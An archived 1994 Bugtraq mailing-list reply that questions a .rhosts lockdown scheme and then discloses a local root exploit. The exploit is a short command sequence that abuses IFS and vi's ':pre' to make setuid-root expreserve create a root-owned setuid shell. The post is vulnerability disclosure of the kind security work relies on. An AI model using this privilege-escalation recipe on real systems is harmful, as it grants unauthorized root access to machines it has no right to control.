|
Bugtraq
mailing list archives
Re: chmod 000 .rhosts - works?
From: chowes () helix net (Charles Howes)
Date: Sat, 15 Oct 1994 04:21:20 -0700 (PDT)
On Sat, 15 Oct 1994, James Seng wrote:
Anyway, what i did on my system is put a .rhosts file in every user
directory. chmod 000 .rhosts and chown root .rhosts. Not all user needs
.rhosts file. Those who wants to use them email me and i will chown back
to them. (any problem with that? :-)
James Seng Ching Hong ~{W/Uq:j~}
Technet Student Consultant, Technet Unit
Internet: jseng () solomon technet sg
If the users own their home directories, then what prevents them from
removing that file?
Oh, I detect an OS-dependent feature here...
ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
versions). Expreserve is setuid root. Expreserve runs /bin/mail
with 'system()'. So, do the following:
% cd /tmp
% cp /bin/sh fubar
% cat > bin
chmod 4755 fubar
^D
% chmod u+x fubar
% setenv IFS=/
% vi
:pre
:q
% fubar
#
Some versions of expreserve don't have the hole.
Some versions of vi don't have the :pre command.
One does not imply the other.
Argh. Am I repeating 8lgm material here?
--
Charles Howes -- chowes () helix net
Always tell the truth, then you make it the other bloke's problem!
- Sean Connery, 1971
 By Date 
By Thread
Current thread:
|
Intro
